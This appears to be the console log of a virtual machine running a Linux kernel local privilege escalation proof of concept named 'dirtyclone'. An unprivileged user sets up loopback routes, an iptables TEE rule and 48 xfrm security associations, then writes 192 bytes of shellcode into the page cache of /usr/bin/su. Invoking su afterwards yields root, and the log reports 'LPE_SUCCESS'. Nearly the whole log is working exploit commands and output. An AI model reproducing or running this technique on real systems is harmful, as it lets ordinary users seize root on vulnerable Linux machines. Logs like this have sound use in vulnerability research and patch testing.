c[?7lSeaBIOS (version 1.17.0-debian-1.17.0-1ubuntu1) iPXE (https://ipxe.org) 00:03.0 CA00 PCI2.10 PnP PMM+1EFC8B80+1EF08B80 CA00 Press Ctrl-B to configure iPXE (PCI 00:03.0)... Booting from ROM..c[?7l+ mkdir -p /proc /sys /dev /mnt /tmp + mount -t proc proc /proc + mount -t sysfs sysfs /sys + mount -t devtmpfs devtmpfs /dev + mount -t ext4 -o ro /dev/vda /mnt + mkdir -p /mnt/proc /mnt/sys /mnt/dev /mnt/tmp + mount --bind /proc /mnt/proc + mount --bind /sys /mnt/sys + mount --bind /dev /mnt/dev + mount -t tmpfs tmpfs /mnt/tmp + cp /dirtyclone /mnt/tmp/dirtyclone + chmod +x /mnt/tmp/dirtyclone + cp /runas /mnt/tmp/runas + chmod +x /mnt/tmp/runas + cp /bin/busybox /mnt/tmp/busybox + chmod +x /mnt/tmp/busybox + cat + chmod +x /mnt/tmp/init + mount --bind /mnt/tmp/init /mnt/init + exec switch_root /mnt /init + export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/tmp + export XTABLES_LIBDIR=/usr/lib/x86_64-linux-gnu/xtables + /sbin/modprobe -a xt_TEE nf_dup_ipv4 esp4 xfrm_user + uname -a Linux (none) 7.0.9-070009-generic #202605191504 SMP PREEMPT_DYNAMIC Thu May 21 05:40:38 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux + id uid=0(root) gid=0(root) groups=0(root) + echo === running exploit as uid 1000 === === running exploit as uid 1000 === + /tmp/runas 1000 1000 /tmp/dirtyclone -v + echo exploit rc=0 exploit rc=0 + cat /tmp/exploit.log [dc] cmd: ip addr add 10.99.0.2/32 dev lo 2>/dev/null -> 0 [dc] cmd: ip route add 10.99.0.2/32 dev lo 2>/dev/null -> 0 [dc] cmd: iptables -t mangle -A OUTPUT -p udp --dport 4500 -j TEE --gateway 10.99.0.2 -> 0 [dc] installed 48 xfrm SAs [dc] wrote 192 bytes to /usr/bin/su starting at 0x0 [dc] /usr/bin/su page-cache patched (entry 0x78 = shellcode) + echo === LPE check as uid 1000 === === LPE check as uid 1000 === + /tmp/runas 1000 1000 /bin/sh -c echo id | /usr/bin/su + cat /tmp/lpe.log uid=0(root) gid=0(root) groups=0(root) + grep -q uid=0 /tmp/lpe.log + echo LPE_SUCCESS: unprivileged user got root LPE_SUCCESS: unprivileged user got root + /tmp/busybox poweroff -f [ 10.284284] reboot: Power down